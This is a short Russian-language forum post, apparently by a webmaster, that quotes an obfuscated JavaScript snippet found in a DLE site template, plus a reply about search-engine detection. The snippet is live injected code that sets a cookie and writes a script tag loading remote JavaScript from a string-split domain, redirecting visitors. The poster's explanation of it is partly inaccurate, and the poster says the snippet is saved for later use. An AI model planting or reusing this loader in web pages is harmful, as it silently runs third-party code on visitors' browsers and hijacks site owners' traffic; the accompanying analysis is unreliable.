Копаясь на супре, я в одной теме нашел такой код:

<!--COOKIE UPDATE-->
<script type="text/javascript">
function setCookie(cname,cvalue,exdays)
{
var d = new Date();
d.setTime(d.getTime()+(exdays*24*60*60*1000));
var expires = "expires="+d.toGMTString();
document.cookie = cname + "=" + cvalue + "; " + expires;
}

function getCookie(cname){var name = cname + "=";var ca = document.cookie.split(';');for(var i=0; i<ca.length; i++) {var c = ca.trim();if (c.indexOf(name)==0) return c.substring(name.length,c.length);}return "";}if(!getCookie('ml_redirrect')){setCookie('ml_redirrect',1,30);document.write("<script type="text/javascript" src="ht"+"tp://m"+"ob"+"il"+"eg"+"et"+"t"+"i"+"n"+"g."+"ru/j"+"s?"+"id=7"+"7"+"4"+"9"></script>");   }
</script>
<!--COOKIE UPDATE-->

Ясно, что это редирект. Но редирект довольно интересный - с помощью функции d.setTime происходит запоминание куков, указанных в document.cookie. Причем происходит каждые 24 часа. Но и это еще не все.

Здесь:

document.write("<script type="text/javascript" src="ht"+"tp://m"+"ob"+"il"+"eg"+"et"+"t"+"i"+"n"+"g."+"ru/j"+"s?"+"id=7"+"7"+"4"+"9"></script>");

зашифрован сайт mobilegettinq.ru плюс реферальная ссылка (после слэшей /). Как было написано на супре, код входил в шаблон DLE. Видимо автор заранее установил код в шаблон, а затем уже дело техники - он выполнялся каждые сутки сразу на всех сайтах, где был установлен.

Очень интересный код :3 

Отправился в копилку. 

 

Нужно будет проверить, палится ли данный метод через link search 

WinsanT, на том же супре говорилось что палится как мобильный редирект. Яша его выуживал.